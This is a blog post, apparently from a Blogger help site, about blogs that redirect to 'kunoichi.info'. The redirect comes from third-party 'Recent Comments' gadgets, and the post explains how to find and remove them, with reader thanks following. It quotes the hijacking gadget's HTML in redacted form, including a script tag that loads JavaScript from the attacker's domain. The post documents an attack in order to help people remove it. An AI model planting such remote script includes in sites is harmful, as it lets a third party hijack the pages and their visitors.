Skip to main content

Blogger Blogs Redirecting To "kunoichi . info"

In the latest round of blog hijacks, from misbehaving or miswritten accessory gadgets, we have reports this month in Blogger Help Forum: Something Is Broken about blogs redirecting to "kunoichi . info".
My Blogger site, xxxxxxx . blogspot . com, with over 8 years of blog posts archived, has been redirected without my permission, to "kunoichi . info". I see my blog for a few seconds before it goes to the new site.

If we use a text only browser, such as an HTTP trace utility, the offending code is directly visible. Here's an example, taken from the latest forum problem report (and rigourously redacted).

<div class='widget HTML' id='HTML2'>
<h2 class='title'>Recent Comments</h2>
<div class='widget-content'>
<script style="text/javascript" src="http : // kunoichi . info / blogger _ buster / comments.js"></script><script style="text/javascript">var a_rc=5;var m_rc=true;var n_rc=true;var o_rc=100;</script><script src="http : // xxxxxxx . blogspot . com /feeds/comments/default?alt=json-in-script&callback=showrecentcomments"></script>

So far, identification and removal, of the problem code, seems to be straightforward - just access the "Page Elements" wizard (Classic Blogger GUI) or the "Layout" menu wizard (New Blogger GUI), find the offending gadget, and remove it. As always, you are advised to clear cache and restart the browser, after removal and before testing.

>> Top


Andrejs said…
Thanks. Just ran into this issue. In case someone runs into a similar problem. Couldn't find it in the Layout GUI for a while. Then stumbled across it when I edited the comments gadget.
Jennifer said…
Hey, thanks. My blog is dormant as far as new posts, but I do go back to it to look at older things now and then. My BF discovered it had the Kunoichi redirect problem, and I found your post by Googling "blog hijacked to".

Your solution worked, and all is now well. What I would like to know is, how did the code get in there in the first place?

In any case, thanks for the solution!
Chuck Croll said…

You probably deleted a very useful sounding gadget - typically the problem will be in "Recent Comments" / "Recent Posts" or maybe "Daily Calendar". When initially installed, the gadget will work just fine.

What the hacker did is write the code, that you installed on your blog, so it references his personal code library. After his hacked gadgets had been installed by thousands of blog owners, the hacker updated his code, and it now redirects to "kunoichi . info".

In a similar case, the hacker is advising people to read his blog. The article on his blog instructs people to remove the "bad" gadgets, and get updated gadgets from his personal library - not Google hosted.

In effect, this guy is using the Google code library to advertise his personal expertise as a hacker.

We have had this exploit twice, in the past. The first time, it took us like 6 months before we noticed a pattern - and we had hundreds of problem reports in the forums, when the gadgets matured. The second time, we knew what to look for - and this time, we were ready for the attack.
Jennifer said…
Ah, okay, that makes sense.

In my case, it was "Recent Comments," so I had wondered if someone had left the code in a comment, which was then displayed on the page, causing the problem.

Your explanation makes more sense, though - for the text of a comment to be able to hijack a blog would be a pretty big security hole!

In any case, it's gone and now I know it won't happen again. Thanks!
Cindee said…
Thank you SO much for the fix. I had no idea what to do. You responded so quickly too. Thanks again!!
Thanks a lot I just recovered my blog using ur help
Globus said…
good post, which globus found useful. thanks.
Chuck Croll said…

You will be at the end of a very long line.

Popular posts from this blog

Stats Components Are Significant, In Their Own Context

One popular Stats related accessory, which displays pageview information to the public, is the "Popular Posts" gadget.

Popular Posts identifies from 1 to 10 of the most popular posts in the blog, by comparing Stats pageview counts. Optional parts of the display of each post are a snippet of text, and an ever popular thumbnail photo.

Like many Stats features, blog owners have found imaginative uses for "Popular Posts" - and overlook the limitations of the gadget. Both the dynamic nature of Stats, and the timing of the various pageview count recalculations, create confusion, when Popular Posts is examined.

Free Domain Registration By "UNONIC" Is Fraudulent

Blogger blog owners, like everybody else, like to save money.

Some blog owners prefer to save money when registering a custom domain, for their blogs. We've seen several free domain registration services, providing what is claimed to be a two level Top Level Domain "co.xx" (where "xx" == various country codes).

The latest in this ongoing story appears to be "" - and 13 other "top level domains".There is also an additional free service offering third-level .tf domains, under the name United Names Organisation. They occupy 14 second-level domains, including,,, and They are run by the same company as, and are given away as URL redirections.